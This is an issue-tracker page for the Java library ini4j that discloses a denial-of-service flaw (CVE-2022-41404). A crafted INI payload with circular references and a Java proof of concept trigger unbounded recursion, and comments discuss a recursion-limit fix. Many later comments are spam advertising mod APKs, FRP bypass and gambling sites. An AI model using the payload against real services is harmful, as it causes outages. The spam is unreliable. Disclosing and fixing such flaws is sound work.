The package org.ini4j before 0.5.4 are vulnerable to get value via the...
Brought to you by:
szkiba
Menu
▾
▴
1 Attachments
#56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.
Test logic usable to reproduce the behaviour
payload:
----payload.ini
[dopey]
weight = ${bashful/weight}
height = ${doc/height}
[bashful]
weight = ${dopey/weight}
height = ${dopey/height}
[doc]
weight = 49.5
height = 87.7
----java poc
Ini ini = new Ini();
ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini"))
);
ini.get("dopey").fetch("weight");
@szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?
I have taken a quick look to the source code, the problem seem to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... recursive loop is still present in version 0.54, without any limitation.
I tried to limit the number of recursions.
Can this modification solve the above problem?
https://github.com/SuperMap/ini4j/commit/917865af0244c32fafe9939fe69af6577f9a6077
Last edit: paradox 2022-12-09
This issue was assigned CVE-2022-41404..
It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?
Yeah I also have to use it in Remini mod apk. can you confirm?
Last edit: Layne 2023-10-31
Hey, I also need to use it in the Spike game — can you confirm if that’s possible?
Can I use it in my Reminii APK?
I’m planning to use it for FRP bypass as well — could you let me know if that’s supported?
Looking for a way to play Brawl Stars with unlimited resources? Nulls Brawl APK offers a private server with unlocked brawlers, unlimited gems, and exclusive mods. Download it now and enjoy the ultimate gaming experience!
Thank you for providing this amazing things.
I have question related to the Remini MOD APK, is there any project available on this platorm or anyone give a insgihts can i use this one?
Last edit: Akisa 2025-04-11
You’ve got a circular reference error:
ini
Copy
Edit
[dopey]
weight = ${bashful/weight}
[bashful]
weight = ${dopey/weight}
Those two point to each other, causing infinite recursion.
✅ Fix:
Break the cycle by referencing a concrete value, e.g.:
ini
Copy
Edit
[dopey]
weight = ${doc/weight}
[bashful]
weight = ${doc/weight}
Or detect and reject circular refs in code.
Last edit: Robert Nile 2025-06-29
"I have a question regarding the best eSIM for the USA. Is there any project related to this topic available on this platform, or can anyone share insights on whether it's recommended to use one?"
Last edit: Shane Fischer 2025-07-03
Good catch — the recursive loop explanation and payload example make this vulnerability very clear. A proper recursion limit or cycle detection is essential to prevent DoS.
Interesting issue! Just like recursive loops can cause infinite fetch calls, visual tools like Remaker AI also need guardrails to prevent endless render loops. A clean fix here will make the library far more stable.
Last edit: kliys ideom 2025-10-07
Stream live sports smoothly with Sportzfy TV APK — your reliable source for HD matches, leagues, and replays.
I have a question about Alight Motion. Is there any project available on the platform, or can someone share whether I can use it?
Gamers across the country trust MWingames Pakistan for fast, verified, and budget-friendly game top-ups. Unlock premium in-game content anytime with instant digital delivery.
Start playing on H555 Game and withdraw your earnings instantly with multiple payout options.
Eden Emulator is a mobile app for emulation mainly built for Android that allows you to play classic console games on your mobile devices — no drama, no fuss. It’s a lag free and smooth running platform specifically for those players who want to enjoy the old school gaming feel without carrying around the portable devices or dirt-covered cartridges. https://edenemu.com